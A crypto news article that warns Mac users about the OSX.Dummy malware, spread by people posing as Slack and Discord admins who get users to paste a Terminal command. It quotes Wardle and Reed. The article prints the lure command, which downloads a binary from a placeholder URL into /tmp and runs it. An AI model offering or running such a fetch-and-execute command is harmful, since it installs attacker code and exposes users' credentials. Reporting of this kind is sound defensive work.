“Dumb” Malware Targets Mac Crypto Miners

Mac miners beware, black hats are attempting to infect machines with malware that has been dubbed “OSX.Dummy.”

Dumb Malware Created to Trap Dumb Mac Users

Crypto enthusiasts who access discussion channels using Slack, Discord and possibly other messaging platforms be forewarned that if using a Mac someone may be trying to lure you into a trap. The culprits are impersonating administrators on the platforms and encouraging members to copy and paste the long command into a Terminal window on their machines. The command establishes a remote connection which can act as a backdoor for the attacker once it downloads and executes the 34-megabyte file malware.

The command, below, would download a binary named “script” to the /tmp folder and then ran it as root.

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Mac malware expert Patrick Wardle examined the bug and named it “OSX.Dummy” as reported by ars Technica, where he broke it down to all its dumb aspects:

the infection method is dumb
the massive size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are rather limited (and thus rather dumb)
it’s trivial to detect at every step (that dumb)
… and finally, the malware saves the user’s password to dumpdummy

The malware was discovered last week by Remco Verhoef, an ISC SANS handler and founder of DutchSec. Thomas Reed, one of several Mac malware experts who analyzed the infection said,

 “We don’t yet know exactly what the hacker(s) behind the malware may intend to do with access to the infected machines, but given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency,”

Mac Cryptocurrency Miners Targeted

Wardle warned that the victim’s macOS root password being saved as cleartext in the file /Users/Shared/dumpdummy and /tmp/dumpdummy, will most likely be used for malicious activity in the future.

All three experts agree that the malware is basic in its function but that even if users remove the OSX.Dummy malware the file may persist if the infection isn’t cleaned out of the machine properly.

As Reed detailed, “Future malware could be designed to find the locations of these files created by the [OSX.Dummy] malware, gaining access to your password for free,” Adding in his blog post that “if users are so careless and unaware of the dangers of running code they copied from an online forum, they most likely have no clue about security best practices to begin with.”

Image from Shutterstock